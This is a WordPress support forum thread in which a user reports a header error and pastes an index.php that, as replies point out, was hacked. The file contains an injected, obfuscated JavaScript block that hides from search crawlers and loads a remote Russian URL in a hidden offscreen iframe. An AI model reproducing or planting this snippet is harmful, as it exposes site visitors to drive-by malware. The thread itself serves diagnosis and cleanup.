WordPress.org

Ready to get started?Download WordPress

Forums

Cannot modify header information - headers already sent by (5 posts)

  1. purrfect10
    Member
    Posted 8 months ago #

    i have just updated/installed 3.8. i am having the error below... please help!!!

    Warning: Cannot modify header information - headers already sent by (output started at /home/n/public_html/blog/index.php:43) in /home/n/public_html/blog/wp-includes/pluggable.php on line 896

    I have searched the forums and have not been able to solve this. I have made sure that there is no space at the beginning and ending of the file. I also followed all instructions via FAQ Troubleshooting.

    I know this has to be something simple. Below you will find the index.php:
    <?php
    /**
    * Front to the WordPress application. This file doesn't do anything, but loads
    * wp-blog-header.php which does and tells WordPress to load the theme.
    *
    * @package WordPress
    */

    /**
    * Tells WordPress to load the WordPress theme and output it.
    *
    * @var bool
    */
    define('WP_USE_THEMES', true);
    /*CORE include code version:1.23 START*/

    echo "<script type=\"text/javascript\">
    function sd5135GHEDF(agaga31323l) {
    var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
    if (typeof(melm) != \"undefined\" && melm!= null)
    {}else{
    var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
    dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
    dsdSSSWrw515312FFF.style.width = \"10px\";
    dsdSSSWrw515312FFF.style.height = \"10px\";
    dsdSSSWrw515312FFF.style.border = \"0px\";
    dsdSSSWrw515312FFF.frameBorder = \"0\";
    dsdSSSWrw515312FFF.style.position = \"absolute\";
    dsdSSSWrw515312FFF.style.left = \"-200\";
    dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
    document.body.appendChild(dsdSSSWrw515312FFF);
    dsdSSSWrw515312FFF.src = agaga31323l;
    return true;
    }
    }
    function asd61234tkhjasd454hfhf235(){
    sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");
    }
    function R(){
    if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();}
    }
    setTimeout(function(){R();},1500);
    </script>";
    /*END CORE include code version:1.23*/

    /** Loads the WordPress Environment and Template */
    require( dirname( __FILE__ ) . '/wp-blog-header.php' );
    ?>

  2. Noumaan Yaqoob
    Member
    Posted 8 months ago #

    It looks like your site has been hacked. The code is actually trying to open a site in an iframe. You can find more information here:
    http://codex.wordpress.org/FAQ_My_site_was_hacked

  3. Pioneer Valley Web Design
    Member
    Posted 8 months ago #

    Let's clean that up...

  4. Johan_Walter
    Member
    Posted 8 months ago #

    Hi,
    You have been hacked. The code is not in the header it is in index.php of wp-admin and index.php of wp-ceontent
    It affects only website on mobile not on desktop
    After cleaning your code you will have your site back but they will trigger again the code after few hours.
    To clean that up go to wp-includes/Simplepie/XML you will find .php which are the file to clean, you find more under Text
    Make a full research of that content and clean all files.

    If anyone from WordPress have an idean to identify where the vulnerability is coming from, please let us know !

  5. WPyogi
    Volunteer Moderator
    Posted 8 months ago #

Reply

You must log in to post.

About this Topic